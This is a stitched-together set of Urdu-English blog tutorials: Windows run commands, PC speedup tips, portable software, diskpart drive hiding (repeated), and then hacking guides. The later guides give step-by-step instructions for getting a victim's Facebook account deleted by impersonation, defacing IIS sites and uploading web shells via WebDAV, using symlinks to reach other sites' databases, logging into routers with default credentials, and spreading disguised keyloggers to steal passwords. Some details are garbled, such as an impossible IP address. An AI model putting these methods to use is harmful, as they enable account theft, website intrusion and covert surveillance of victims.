11) Check Disk Utility
- chkdsk

12) Clipboard Viewer
- clipbrd

13) Command Prompt
- cmd

14) Component Services
- dcomcnfg

15) Computer Management
- compmgmt.msc


Part-3

16. Disk Cleanup Utility
- cleanmgr

17. Disk Defragment
- dfrg.msc

18. Disk Management
- diskmgmt.msc

19. Disk Partition Manager
- diskpart

20. Display Properties
- control desktop

21. Display Properties
- desk.cpl

22. Dr.Watson System Troubleshooting Utility
- drwtsn32

23. Driver Verifier Utility
- verifier

24. Event Viewer
- eventvwr.msc

25. Files and Settings Transfer Tool
- migwiz

Part-4

26) Files and Settings Transfer Tool
- migwiz

27) File Signature Verification Tool
- sigverif

28) Findfast
- findfast.cpl

Part-5

29) Firefox
- firefox

30) Folder Properties
- control folders

31) Fonts
- control fonts

32) Fonts Folder
- fonts

33) Free Cell Card Game
- freecell

34) Game Controllers
- joy.cpl

35) Group Policy Editor (for xp professional)
- gpedit.msc

36) Hearts Card Game
- mshearts

Part-6

37) Help and Support
- helpctr

38) HyperTerminal
- hypertrm

39) Iexpress Wizard
- iexpress

40) Indexing Service
- ciadv.msc

41) Internet Connection Wizard
- icwconn1

42) Internet Explorer
- iexplore

43) Internet Properties
- inetcpl.cpl

Part-7

44. Keyboard Properties
- control keyboard

45. Local Security Settings
- secpol.msc

46. Local Users and Groups
- lusrmgr.msc

47. Logs You Out of Windows
- logoff

48. Malicious Software Removal Tool
- mrt

49. Microsoft Chat
- winchat

50. Microsoft Movie Maker
- moviemk

Part-8

51. Microsoft Paint
- mspaint

52. Microsoft Syncronization Tool
- mobsync

53. Minesweeper Game
- winmine

54. Mouse Properties
- control mouse

55. Mouse Properties
- main.cpl

56. Netmeeting
- conf

57. Network Connections
- control netconnections

Part-9

58. Network Connections
- ncpa.cpl

59. Network Setup Wizard
- netsetup.cpl

60. Notepad
- notepad

61) Object Packager
- packager

Part-10

62. ODBC Data Source Administrator
- odbccp32.cpl

63. On Screen Keyboard
- osk

64. Outlook Express
- msimn

65. Paint
- pbrush

66. Password Properties
- password.cpl

67. Performance Monitor
- perfmon.msc

68. Performance Monitor
- perfmon

Part-11

69. Phone and Modem Options
- telephon.cpl

70. Phone Dialer
- dialer

71. Pinball Game
- pinball

72. Power Configuration
- powercfg.cpl

73. Printers and Faxes
- control printers

74. Printers Folder
- printers

75. Regional Settings
- intl.cpl

Part-12

76. Registry Editor
- regedit

77. Registry Editor
- regedit32

78. Remote Access Phonebook
- rasphone

79. Remote Desktop
- mstsc

80. Removable Storage
- ntmsmgr.msc

81. Removable Storage Operator Requests
- ntmsmgr.msc

Part-13

82. Resultant Set of Policy (for xp professional)
- rsop.msc

83. Scanners and Cameras
- sticpl.cpl

84. Scheduled Tasks
- control schedtasks

85. Security Center
- wscui.cpl

86. Services
- services.msc

87. Shared Folders
- fsmgmt.msc

88. ShutDown Windows
- shutdown

Part-14

89.Sounds and Audio
- mmsys.cpl

90.Spider Solitare Card Game
- spider

91. SQL Client Configuration
- cliconfg

92. System Configuration Editor
- sysedit

93. System Configuration Utility
- msconfig

94. System Information
- msinfo32

95. System Properties
- sysdm.cpl

Part-15

96.Task Manager
- taskmgr

97.TCP Tester
- tcptest

98.Telnet Client
- telnet

99.User Account Management
- nusrmgr.cpl

100.Utility Manager
- utilman

101.Windows Address Book
- wab

102.Windows Address Book Import Utility
- wabmig

103. Windows Explorer
- explorer

Make Fast Speed Of PC


P1   friends aksar hmary pc ke speed slow ho jate hai. Iske waja yeh hai. Ky hamary pc main bohat sy falto Programs chalty rehty hain.
P2 asal main hm yeh program apni zarorat kelye aik bar install krty hain magar yeh program ya isky kuch parts pc main silently chalt hain.
P3 misal ky tor pr hm ny yahoo msngr install kia. Ab hm jb b pc chalaty hain. Yahoo msngr auto run ho jata hai Aur time wali jaga pr ajata h
P4 aur yahoo msngr hamary pc aur net ke speed pr asar andaz hota hai. Pc main check krny kelye ky konsa program silently run ho raha hai.
P5 hm task manager main process ke tab sy check kren gain. Ismain apko svhost windows ky programs aur antivirus ka proces nazar ain gain.
P6 aksar auqat hamary pc main koi virus ya trojan proces kr raha hota hai. Aur hamara antivirus b usy detect nain kr pata.
P7 task manager ko agar ap regulary check krty rahen gain tu apko pata chal jay ga. Ky koi new program run kr raha hai.
P8 ap usy manualy end task kr skty hain. Aur agar ap google main us program ka name likhen gain tu apko uske pori detail mil jay ge.
P9 task manage ctrl alt delete press krny sy show hota hy. Agar woh show na ho tu samaj lain virus ny disable kia hai. Ta Ky hm usy end task na kr sken.
P10 pc ke speed ka asar temprary file sy b partha hai. Aur kuch viruses ka backup b yahan hota hai. Window main 2 temp folder hoty hain.
P11 run main %temp% type kren main temprary folder ajai ga. Yahan sy sb files ko delet kr dain 2nd run main just temp type kren yah C drive
P12 window main temp ka foldr show ho jay ga. Yahan b sb files delet kr dain. Temprary folders main kuch files delet nain ho ge Q ky woh
P13 task manger main proces kr rahe hon ge Ap chahy tu unhain chorh dain ya phr proces main sy end task krky dobara delet kren del ho jay ge
P14 window main aik folder prefetch b hai usmain mojod sb files delet kr dain. Sb sy best yeh hai ky AP Ccleaner software ure kren.
P15 aksar auqat hm koi software use krty hain. Aur phr uninstall kr daity hain. Magar woh window sy fully uninstal nain hota usky kuch parts
P16 window ke ragistry main reh jaty hain. Jo pc ke speed pr asar dalty hain. Ragistry ko falto ragistry entries sy clean krny kelye net
P17 main bohat sy ragistry cleaner software mojod hain. Sb sy best software tuneup utilities hai. Jo window aur ragistry ko clean krta hai.
P18 hm aksar files ko delet copy ya paste krty hain. Is amal sy harddisk main data, hardisk ke CD Plate pr bikhar jata hai. Jo hard ko slow
P19 kr daite hai. Hamin data tu aik tarteeb sy he rkha hota nazar ata hai. Magar asal main aisa nain hota. Data ko sametny kelye hard ko defregment
P20 krna hota hai disk ko defragment krny kelye run maim dfrg.msc type kren. Aur hr drive ko bari bari defragment kren. Hard fast ho jay ge
P21 disk dfrgmnt kelye best software tune up utilites hai. Google main tuneup utilities mediafire likhen yahan sy ap ko full version mily ga
P22 RAM ke performance fast krny kelye my computer pr right click krky Properties main jain. Phr advance aur Performance ke setting pr click
P23 click kren next phr advance aur virtual memory ky change pr click kren. Ab intial size aur maximum size dono ke amount double krdain.
P24 aur set pr click kr dain pc restart mangy ga. Restart hony ky bad pc ke speed fast ho jay ge. Aur RAM ke perforance b behtr ho jay ge.
P25 koshsh kren ky koi bhe software install krny ke bjay uska portable version use kren portable software mean jo witout installation ky run ho
P26 Portable software net sy easly mil jaty hain aur hum isy install kye bagair use kr skty hain. Aur USB main b use kr skty hain.
 End

How WiFi Phone Work

P1 Dosto Ajj main ap ko Wifi Ky Bary Main Btata ga Wi-fi Stand For Wireless Fidelity yeh wireless technology hai, yeh tecnology jadid Mobiles Laptop aur Computer main hoti hi. is ke madad sy app free main apni Device ko internet sy connect kar skty hain. aur jitna chahy use kar skty hain, iski aik Khas range hoti hi. jo kai meel tk ho skti hai.
 P2 U.K ky City Manchester main apko hr jaga Wifi mily ga. yahan app apny laptop, mobile yah kisi dosri device sy internet free use kar skty hain. wifi system abb dosry countries aur cities main boaht taize ky sath phel raha hai.aur main ny punjab universty lahore ky bary main bhi suna hai ky unhon nain bhi wifi system lagaya hai jo 2,3 kilometer ke range main kaam karta hai.


 P3 agar ap ky pass aik broadband internet connection hai, aik router hai tu app aik wifi hot spot bna skty hain, aur loog apky net sy free connect ho skty hain. yah app un sy monthly charges bhi ly skty hain  Wifi System main aik wireless router aur aik usb device milty hai, jis ke price 800 sy 1500 Rs tk hoti hai.
 P4 ajj kl jitny bhi new laptop aur desktop computer aa rahi hain un main Wifi system pehly sy mojood hota hai.agar apky pc main yeh system phely sy mojod nahin hain tu markeet sy apko wifi device easly mil jai gee. agar app kisi wifi net range main hon just Wifi usb apny pc main lagain aur free internet use karin.
 P5 Wifi System mostly Offices, Airports, Hotels, aur universties area main use hota hai. aur agar app in areas main hoon tu net free use kar skty hain. Q, Mobiles aur new latest nokia main abb wifi use hony laga hai magar yeh mobile abhi thory sy mehangy hain 7000 Rs sy in ke price start hoti hai.(Q E95 7300 Rs, Q E990 8400Rs, Q uy 9700Rs )
 P6 Wateen, Wi-tribe bhi Wifi ke he aik shakal hai.in future qareeb Wifi system pori dunya main use hoga, aur har bnda wifi use kary ga.wifi ka aik disadvantage yeh hai ky iss sy apka system hack hony ky chanse ziada hoon gain. magar iss ka bhi solution hai.aur wifi ko password protect kar lia jata hai 
end

Make Portable software


P1 friends aj main apko Portable software bnany ka tariqa btata hon. Portable softwares woh software hoty hain. Jin ko PC main install krny ke zarorat nain hote. Blky woh direct install kye bagair chal jaty hain. Portable software ka faida yeh hota hai. Ky ap usy USB main daal kr kisi b PC sy direct withoution installation ky run kr skty hain.

P2 Portable softwares ka aik yeh faida b hota hai. Ky hamin kuch softwares ke hafton ya maheno bad zarorat parti hai. Aur hm un software ko PC main install krky PC ke speed km aur space main kami paida kr daity hain. Jis sy hamary Pc ke performance kharab ho jate hai. Kuch friends kisi institute ke Lab ya office ka PC use krty hain aur wahan extra softwares install krny ke ijazat nain hote. Wahan Portable software kaam daity hain.

P3 Portable software 3 tariqo sy bnty hain. Pehla tariqa software ka backup, 2nd winrar software sy portable sofware bnana. Aur 3rd tariqa "thinstall software" sy Portble software bnana hai.

P4 pehla tariqa backup sy portable bnana. Is tariqy main hm pehly software ko install krty hain.. Aur C Program files main ja kr jahan woh sofware install hota hai uska pora folder copy krky kisi dosry drive main paste kr daity hain aur woh sofware hamara simple portable software bn jata hai. Ab ap chahen tu jo software ap ny instal kia tha. Uninstall kr dain. Yeh tariqa choty software kelye best hai.


P5. Ap software ko install kye bagair b "universal extractor" software sy software ko direct extract kr skty hain. Universal extractor ko install kren. Aur kisi b software ky setup.exe pr right click krky extract with universal extract kr dain. Apky pas setup name ka "folder" ajai ga. Jis main us software ka sara data para hoga. Aur ap us data ko as a portable software use kr skty hain


P6 2nd tariqa winrar sy portable software bnana hai. Winrar sy Portable software bnany ka faida yeh hai. K hm tamam  portable data ke aik single file bna laity hain. Aur woh compress ho kr space b km laite hai. Winrar sy portable software bnany kelye hm pehly backup wala method he use kren gain.

P7 agar ap ky pas winrar software hai tu thek hai. Nain tu install kr lain. Ab jis software ko Portable bnana hai usky folder main jain aur sary data ko select all kren aur right click krky add to archive pr click kren. Apky samny winrar ka menu ajai gai. Is main options, create SFX archive aur Create Sold archive ko ok kardain. Compression method ko best aur archive format ko rar krdain.

P8 ab general menu ky bad advance menu main jain aur sfx option pr kren. Ab ap ky saamny advance sfx option khul jai ga. Aur wahan text and icon pr click kren. Text to display in Sfx window, box main yeh code likhen.

Setup="your software name.exe"
TempMode
Silent=1
Overwrite=1

your software name ke jaga software ky markazi program ka name likhe. For example
setup="VLC.exe"
aur last option load sfx icon from the file main software ky mutabiq koi acha sa icon select krky ok krdain. Apka 1st Portable software bn jay ga.

P9 winrar sy b backup waly tariqy ke tara sirf choty software sy he Portable software bnty hain. Kion ky bary software window ke Ragistry ky sath attach hoty hain. Aur in softwares ka kuch data  window, common files, application data, ya kisi khas folder main chala jata hai. Aur jb ap portable software bnaty hain. Tu kuch fill missing ho jate hain. Aur phr Program error daita hai aur run nain hota. Iska solution yeh hai ky ky jis file ka error dai unhain PC main search kr lain. Aur agar ap ny universal extractor sy software extrace kia hai. Tu woh error nai dai ga.

P10 thinstall sy portable software bnana sb sy asan hai. Aur ziada tr thinstall sy he portable software bnay jai jaty hai. sb sy pehly thinstall instal kren. Aur iska shourtcut thinApp setup capture desktop pr lain aur isy run kren. Welcome to setup capture  ko next karen.yahan advance setting main ja kr jis drive main setup rkha hai jaise D drive Usy aur jis drive main software instal krna hai for example C usy check kr dain. Aur ok krky next kr dain.

P11 prescan ka progres start ho jai ga. Prescan main thinstall apky pc ke ragistry ko read kry ga. Aur usy apny mind main store kr ly ga. Aur next option ly ai ga. Ab thinstall ko minimize kren, aur ap us software ko install kren. Jisko portable bnana hai. Install hony ky bad usko crack ya keygen etc b laga kr full version krlain.

P12 software install krny ky bad thinstall ko dobara maximized kren aur next pr click kr dain. Next krny ky bad thinstall  Postscan ka menu aye ga. Postscan main thinstall pehly sy kye hoy Prescan ko Postcan ky sath compare krky check kry ga. Ky apky pc main kia tabdeele ai hai. Aur Pc ke ragistry main kia new entries ain hain. Post scan krny ky bad next menu main hamin result show kr dai ga.

P13 result waly menu main apko ms dos, ragistry, aur internet ka icon nazar ain gain. Inhain ignore kr dain. Insky sath ap ny jis software ko install kia hai. Usky, main programs nazar ain gain. Jinke extention .exe ho ge. Ab usmain, main Program ko select kren. For example ap ny VLC mediaplayer ko Portable bnana hai. Tu apky saamny VLC.EXE show hoga usy check lagain. Aur next krdain.

P14 next menu main  sandbox location main user profile ko ok kr dain next pr click krdain. Marged isolation mode ko ok he rehny dain. Compression ke option apke choice hai. Jo b select krna chahen. Aur next kr dain. Creating a project start ho jai ga. Aur thinstall apky software ko copy krky aik new folder main ly ai ga.isky bad Last menu ai ga. Wahan bulild now ka bttn press karin apka sofware Portable bn jay ga. Aur browse project ke botton pr click krin. Yahan bohat sy folder show hon jain gain wahan bin naam ky folder main apka Portable software Mojod hoga.

P15. Kbi kbi hamary pass software ka setup nain hota. Blky pehly sy install hoa hota hai. Aur uska backup sirf hamary hota hai. Likin hm usy Portable bnana chahty hain.. Tu usky lye yeh krna hoga ky jb software installation ka menu ata hai tb. Ap us data ko copy kren aur kisi dosri drive main paste kr dain. Aur jis drive main paste krna hai. Us drive ko advance setting main pehly sy check b lagana hai. Taa ky jb thinstal scaning kry tu usy pata chal jai ky is drive main kuch copy hoa hai. Aur woh us data ko apny setup main lar kr us ka Portable bna dai ga.


P16 thinstall shorow main thora mushkil  lagy ga. Likin 1, 2 try main apko iska tariqa kar samaj main ajai ga. Aur agar apko is lecture ke samaj b na aye tu ankhain band krky next next krty jain. Qismat ache hoe tu portable software hud he bn jai ga. ;-) Koshesh kren ky apny sath aik ragistry cleaner sofware b rkhen aur hr new prortable software bnany sy pehly ragistry clean zaror kr lia kren tuneup utilites main be ragistry cleaner mojod hai.

P17 Portable software jb b bnain. Us waqat PC main koi aur kam na kren. Q k thinstall apky pc ke tamam activity ko save kr laita hai. Agar koi aur software ya data copy ya download ho raha ho. Tu woh b Portable software ky browse project main copy ho jata hai. Aur 3 mb ka software 103 mb ka bn jai ga. Browse folder main ap hud sy b search krky falto files delet kr skty hain.

P18  hamisha jb b portable software bnain. Kisi dosry pc ya apny dost ky pc main run krky zaror test kren. Ky ap ka software perfect kam krta hai ya nain. Kbi kbi koi file missing ka error daita hai. Tu ap woh file apny pc main sy search krky portable software ky sath rkh dain. Software chal jai ga. portable software ke mazeed details check krny kelye itdunya.com main Software ky sectiom Portable softwarers categary main, 3 way of making portable software, Article post kia hai woh zaror check karin.
End

How To Hide Any Drive Through Command Promp

Have you ever thought of hiding any drive from your system so that no one can knew about it. You may have heard or even used a lot of software’s that might be able to do that, but if you are GEEK like me and want to do things by your own without using any 3rd party software than this tutorial will show you how you can do it.
Well there are 3 ways of doing it, in this tutorial we are covering command prompt way of doing it.



Here is how to do it:

Step 1. Open command Prompt, go to Start Menu > All Programs >Accessories > Command prompt
Step 2. In the Command Prompt, type Diskpart and hit enter key. If UAC (User Account Control), dialog-box prompts than click Yes.
Step 3. Then type List Volume and press enter, this will produce the list of all drives.

Step 4. Now select the drive which you want to hide, you can either do this by typing Select Volume 1 (i.e. Volume Number) or by typing Select Volume C(i.e. Drive letter)

Step 5. To hide a drive, type Remove Letter C. Here, C is the drive letter than you want to hide. You can use any drive letter you want.

Step 6. That’s it. You are done! C drive is now hidden



How to unhide hidden drive

Step 1. Follow the procedure mentioned in step 1, 2, 3 and 4.
Step 2. To show the hidden drive type Assign Letter C and hit enter, now you can view C: drive in explorer.


That’s it. This is one way of hiding and un-hiding drives from explorer, for rest two stay tuned.

How To Hide Any Drive Through Command Promp

Have you ever thought of hiding any drive from your system so that no one can knew about it. You may have heard or even used a lot of software’s that might be able to do that, but if you are GEEK like me and want to do things by your own without using any 3rd party software than this tutorial will show you how you can do it.
Well there are 3 ways of doing it, in this tutorial we are covering command prompt way of doing it.



Here is how to do it:

Step 1. Open command Prompt, go to Start Menu > All Programs >Accessories > Command prompt
Step 2. In the Command Prompt, type Diskpart and hit enter key. If UAC (User Account Control), dialog-box prompts than click Yes.
Step 3. Then type List Volume and press enter, this will produce the list of all drives.

Step 4. Now select the drive which you want to hide, you can either do this by typing Select Volume 1 (i.e. Volume Number) or by typing Select Volume C(i.e. Drive letter)

Step 5. To hide a drive, type Remove Letter C. Here, C is the drive letter than you want to hide. You can use any drive letter you want.

Step 6. That’s it. You are done! C drive is now hidden



How to unhide hidden drive

Step 1. Follow the procedure mentioned in step 1, 2, 3 and 4.
Step 2. To show the hidden drive type Assign Letter C and hit enter, now you can view C: drive in explorer.


That’s it. This is one way of hiding and un-hiding drives from explorer, for rest two stay tuned.

How To Hide Any Drive Through Command Promp

Have you ever thought of hiding any drive from your system so that no one can knew about it. You may have heard or even used a lot of software’s that might be able to do that, but if you are GEEK like me and want to do things by your own without using any 3rd party software than this tutorial will show you how you can do it.
Well there are 3 ways of doing it, in this tutorial we are covering command prompt way of doing it.



Here is how to do it:

Step 1. Open command Prompt, go to Start Menu > All Programs >Accessories > Command prompt
Step 2. In the Command Prompt, type Diskpart and hit enter key. If UAC (User Account Control), dialog-box prompts than click Yes.
Step 3. Then type List Volume and press enter, this will produce the list of all drives.

Step 4. Now select the drive which you want to hide, you can either do this by typing Select Volume 1 (i.e. Volume Number) or by typing Select Volume C(i.e. Drive letter)

Step 5. To hide a drive, type Remove Letter C. Here, C is the drive letter than you want to hide. You can use any drive letter you want.

Step 6. That’s it. You are done! C drive is now hidden



How to unhide hidden drive

Step 1. Follow the procedure mentioned in step 1, 2, 3 and 4.
Step 2. To show the hidden drive type Assign Letter C and hit enter, now you can view C: drive in explorer.


That’s it. This is one way of hiding and un-hiding drives from explorer, for rest two stay tuned.

Chat through Command Prompt

Chat through Command Prompt

Now chat with your Friendz Through The cOmmanD Prompt, first Of All Oped notepad then Follow these Steps :))
  1 >  cOpy this code to notepad

@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A


  2 >  Save this as "Messenger.Bat"

 But All yOu need is your friend's IP Address
nOw Open messenger.bat Enter your friend's iP Then Hit Enter & Then Type your TEXT

How to delete any ones facebook account a little bit of social engeenring?

Requirements.
1. Victom ka full name
2. Victom ki date of birth
3. Victom ki fb profile ka url address
4. 1 id banayen yahoo per ya gmail per victom kr first and last name ki.
Yeh sari details ap ko victom ke fb account se mil jayen gi.
5.Ab is link er jaen
www.facebook.com/help/contact.php?show_form=cannot_identify
6.Ab jo sari requirements thi wo is form ma fill kr dyn
7. Form ke last option main 'description of your issue'
Us main ap khud victom ban ke kahen je meri yeh id kisi ne hack kr li hai main 1 regulr membr hn or new acnt bnane mn mjhe koi diqqat nhn h.
Facebook team ap ki yeh application parhtw hi wo account 24-72 hours main del mar de gi. And da victom is fuCked.


Trick for IIS Mathod

Iis me hm last me apne deface page ka nam likhte hain site link k agey like www.site.com?/hack.html
but agar hum apna deface page ka nam php xtensn me rakhen jase defacepage.php aur is ise upload karen iis method se. To hamara deface page site k h0me page pe show ho ga agey apne deface page ka nam likhne ki zrorat ni . . ! Trick w0rking but n0t on all iis vul sites. . ! Iski reazn shayd ye k server html se pehle php chk karta ha. .
Iis se site hack ho to jaldi jati hai. . . Par search krna  rola hota hai. . Us ne whan sb ki list daikhi or kha in ko mai hck kr skta hn. . Kr to koi b skta hai par wo khud search kr k hck kr k btai na. . . Kahan milti hn 2003. Win ki sites. . .
Iis ki vulnerablity chinese webs mai bhot hoti hai kiu k china webmastero ko is vul. . Ka nai pata.
Is ki vul. Webs search krni ho to Google.cn mai china k google mai search kro.. Google.cn mai dork lgao.
Ching pu pao tao
iis ki vulnerable sites nai milti. . . . . . . Web dave. . .
b koi site hack ki jaye to us ka ooper link b hona chahiye . . . Like this www.site.com/admin_login.asp isi trah hr site ka apna link hota h. Jb aise link pr jayen to wahan 2 lines hoti hn username and passwors un dono ko fill kro or site mn hr chez edit kr do. . . Ok

IIS Hacking

IIS h4cking k liye dorks to koi nahi hai, but Google.com me kuch b search krlen or jo site b aaye use check kren.
Us site ka link copy karen, Www.site.com,phir start pe click karen or run pe click karen or usme ye code likh k enter karen:
%WINDIR%?/EXPLORER.EXE,::?(20D04FE0-3AEA-1069-A2D8-08002B30309D?)?/::?(BDEADF00-C265-11D0-BCED-00A0C90AB50F?)
Web folders khul jaega, pihr usme file pe click kren, phir new pe or phir webfolder pe.

Add webfolder wizard ajaega. Usme apni site paste karen www.site.com or next karen.
Agar to next hojata hai iska matlab hai k site vul hai or agar connect nahi hota to vul ni ha
Agar next hojae to uska koi bhi name rakhen or finish krden.
Ab webfolder me wo site aa chuki hogi us pe double click kren. Wo khuljaegi. Ab uspe apna page upload krden like u.h.html. Apne page ko copy karen or isme la k paste krden isi tara shell b daalende. Apne shell.php ko copy karen or site k folder me paste krden
Apna page view krne k liye www.site.com/u.h.html or shell dekhne k liye wwe.site.com/shell.php.
----FINISH----
Regards:
Muhammad Azhar Korai

Symlink

A little info abt symlink.Symlink hacking mai buhat kam ke chez h.
Is se ap web ka pura data base download kar saktae ho aur hack b.
Symlink mean similar link.Ye chez linux operating system ne nikali the.Jo log ubunto,fodora ya linux use kartae h unko pta hoga.Symlink tora folder shortcut ke trha hota h.Ap ubunto ma simple foldr pr right click kr k symlink pr click krn ge to ek new foldr bn jaiga symlink ka

asic different symlink aur folder shortcut mai path ka h.Folder shortcut mai path wohe i ga jo real folder ka h.Lekin symlink ma path kuch alag hoga symlink ka path alag hone k wja se ap ek chez ko alag alg jga se cnnect or use kry ho.Example ek portable hardisk k symlink bnai or ek mobil connectivity ma dal dia ek local_root ma etc.Is se portable hardisk ke speed pr frq ni pryga.Symlink alag path jo bnai ga sb k Alag path hnge par excess same chez hoge. . .
Path alag hone ke waja se jo chez par parword ya koi restriction lage ho k ap nh khol saktae.Agar us ka symlink bnaya jai tou wo file khul jai ge.
Nw yae symlink ke info the nw use off symlink in hacking.

Hr web ek computer se chlti h called server.Us server pr hr web ka folder hota h jis ma web ki sari file wagaira save hoti hn.Sirf kuch file ko public rights diye jaty hn.Baki files ko koi nhi chhaer skta admin k ilawa Qk wo public nh.Jb b file open hoti h server check krta h link path k ye file kon khol skta h.Nw hr web folder ma usky pasword b save hnge.Pura data base save hoga.Agr data base download kr leya jai tou web hackSymlink bnane k leye apko shell chahye hoga uploaded kisi web pr.Shell jis web pr uplood hoga us web pr ap changes kr skte ho.Nw jis server pr apka shell wali web h us server pr apna victim dhundo.Then shell se symlink bnao server pr apne victim k data base ka.Or ghus jao data base ma.
Symlink bnane k leye kuch code use hoty hn jo exploit kehlaty hn.Kafi ache exploit mil jaege pr jo boht ache hoty hn wo privat hoty hn log share ni krty
Symlink ka advantage ye hua k frz krn ek web hack krna muskil h par jis server pr web h usi server ki dusri web hack kr k ap symlink apne victim ka bna kr uske tyt security b zero krdo.Matlb kise b server ke ek web hack krli jai tou kafi chance h ap us server k dusri web b hack kr skty ho by symlinkSymlink sirf ek link bnata h jo apko web ka data base wagaira asani se excess dai ga.Acha symlink server par bnta h.Aur server par kuch karne k leyae apko shell chayae.
Shell ap koi b bikar web hack kar k upload kardo.Simple words ap ek server ke koi b ek web hack kar k dusri un hackable web hack kr skty ho.

Introduction about Hacking

What is Hacking??
Why we Hack a Site??
How is it possible to Hack a Site??
Hacking means "Get the Admin Rights on any Site and upload ur Deface Page"
Simply u can say that it means "Breaking the Security"
Now a days, Cyber Wars going on the top with Paki and Indian Hackers. Its a very sensitive and amazing compatition.
If u Hack any Site of any Country(except India),U may be arrested.For this reason,We have to Hide our Ip Address.Many Sites & Softwars provide us Fake Ips.There r many ways & methods of Hacking.In my opinion"Sql Injection"is very easy 4 beginners.We use Scannerz,Tools, Softwarz,Key Loggerz, Shellz,Deface Pagez, Trojanz,Virusez etc 4 Hacking.I think that"Hacking is not a Crime,Its jst a Game of Mind

Chat through Command Prompt

Chat through Command Prompt
Posted by waQar DKD Posted on 05:52 No comments
Now chat with your Friendz Through The cOmmanD Prompt, first Of All Oped notepad then Follow these Steps :))
  1 >  cOpy this code to notepad

@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A


  2 >  Save this as "Messenger.Bat"

 But All yOu need is your friend's IP Address
nOw Open messenger.bat Enter your friend's iP Then Hit Enter & Then Type your TEXT

Chat through Command Prompt

Chat through Command Prompt
Posted by waQar DKD Posted on 05:52 No comments
Now chat with your Friendz Through The cOmmanD Prompt, first Of All Oped notepad then Follow these Steps :))
  1 >  cOpy this code to notepad

@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A


  2 >  Save this as "Messenger.Bat"

 But All yOu need is your friend's IP Address
nOw Open messenger.bat Enter your friend's iP Then Hit Enter & Then Type your TEXT

How to hack DSL connection.?

/"How to hack DSL connection.?"/


H-175
P2
What is DSL
It stands for Digital Subscriber Line
It Offers High Data Transmission Rate b/w 128Kb - 10Mbps
Its a Special Line Via which U can Use Internet as well Phone
It works via network cards and DSL Modem
DSL Types ADSL, R-ADSL, HDSL, SDSL & VDSL


H-176
P3
How To Hack DSL Connecting ?
1st Download Ip Scanner
And Than Install It after Install Open Google And Type In Search Bar What is My Ip and Press Entry Now Open 1st link and See ur Ip..



H-177
P4
Now U Will See Ur Ip E.g 256.100.580.100 Now Open Ip Scanner Software And You Will See 2 Columes Now Write Ur Ip Like this 256.100.580.(1) And In 2nd Colume 256.100.580.(254) Remember that Don't Use () ok Change ur Ip Last number ok..
P5
Now Click On Start And Wait 4 Process Will Complete when Process Completed now Right Click On Any Ip On That Software And Copy the Ip And Paste it in Address bar And entry Now its Ask ur about user and Pass (admin) is User and Pass And Now Enjoy... if u have any Problem Ask Me Thanks Hope U Like it... remember me in ur Prays.End

"H0w To Use A Keyl0gger? Urdu Tutorial

T0pic: "H0w To Use A Keyl0gger?"
All Keyl0gger Same H0te h K0i Bhe 1 D0wnl0ad kr le Net Se Aur Install kre,
Many Keyl0gger Required:
.NET Framework 2.1
Es v D.L Kr k Install kr le, Then 0pen the Keyl0gger and Create Account, Matlb Apni C0rrect Email ID Aur paswrd Entr kr0..
Phr "ADD To Startup" pe Click kr k File Ka Apni Marzi Se Name Rakphe Aur Built pe Click kre, Deskt0p Pe Apki File Aa Jaye Ge, 0s File K0 Apni Vict0m k0 bhej d0 via any S0urce like Email,USB etc. Jb W0 Es file Pe Click kr k file k0 Run kre Ga To w0 File 0s k PC me Install H0 Jaye ge, Phir 0s k k har kam ke Detail Apk0 via Email Milti Rahe ge (Jis Email Pe Apne A.c Bnaya tHa) W0 jb Bhe K0i Acc0unt E.g Faceb0ok, Twitter YahOo, Gmail etc. 0pen kr k L0gin kre Ga t0 0s ka L0gin kiya H0wa username+paswrd Apk0 via Mail mil jay Ga. Ye Acc0unt hack krne ka 1 Advance math0d h,Ye Advance Es TarHa H k Es Se Extra hacking H0 jati h, E.g Agr Ap ne Vict0m ka F.b0ok ka Acc0unt Hack krna H t0 Jb Ap Keyl0gger file Bna Kr 0se Snd Krte h0 Aur w0 file k0 Run bhe kr Lita h Phr jb w0 Apna F.b0ok Ka A.c l0gin kre Ga t0 0s ka w0 FB Acc0unt hack t0 h0 ga he h0 ga, phr jb W0 Apne D0sre jase Twitter Gmail etc. K Acc0unts k L0gin kre Ga t0 w0 Acc0unts bhe hack h0 jay ga.:-P
N0te-: 1 Baat ka Khyal rakHe Apka Antivirus Disable H0na Chahye warna Keyl0gger Install nHai h0 Ga Aur vict0m k PC me bhe Antivirus Disable h0na Chahy nhai t0 Antivirus Apki Keyl0gger file k0 Detact kr le ga
Keyl0gger k Virus PC K0 Damage nHai Karte, Agr Ap ne Check krna H0 k Apka Keylogger W0rking h ya nHai t0 Email Paswrd De kr Test Pe Click kre Aur phr Apne Acc0unt me ja k Dakhe, Agar whan Keylogger ke Mail i h t0 itx w0rking 0therwise itx n0t w0rking

Hacking With Keylogger In Urdu

Hacking With Keylogger In Urdu
Written By: Muhammad Azhar Korai
Keylogger 1 S0ftware H0ta H Ese Ziada Tar Email IDs Hack Krne K Lye Use Kiya Jata H, Keylogger Se Ham 1 file Bnate H Aur W0 file Apne victum K0 Bhejte H Jb W0 Es File K0 Run Kre Ga To, W0 file 0s k Computer Me Install H0 jaye Ge, Es K Bad Jb Apka victum k0i Kam Bhe Kre Ga To Apk0 via Email Pata Chalta Rhay Ga K Apka Victum Kiya Kr Rha H, Har 5 Mints K Bad 0s k Har kam ke Report Apk0 Ap k Email pe Mil Jaye Ga Aur Ye Tab Tak Hota Rhay Ga Jb Tak Apka Victum Window fresh nHi Kr Lita. Asal me Keylogger Jo File Bnata H 0s file me 1 virus(Trojan) h0ta H, Jb Ap File Bna kr Victum K0 Dite h0 aur w0 Es pe Click kr lita h to ye virus 0s k PC me Install Ho Jata H Agay Apk0 Bta dia H k phir kiya H0 Ga.. Keylogger k Virus PC K Lye Harmful nHai H0te
P2: Es me Maze Ke Baat Ye H k Ap Keyl0gger file K0 Image,S0ng,S0ftware ke Shakal De Sakte Ho Keylogger File K0 Image,s0ng ke Shakal Dane k Lye Binder Naam ka S0ftware Use H0ta H, Binder Kafi Qisam k H0te h par Unka Kam same he H0ta H0 k0i 1 Net Se D0wnload kr le
Agar Ap Ye file victum K0 Ditay Ho Aur Agr 0s k PC Me Antivirus Install Howa To 0ska Antivirus Ap ke Keylogger file k0 Detact Kr De Ga, Jiski Wja Se victum File K0 Run nHai Kre Ga

Site Hacking Basics -1

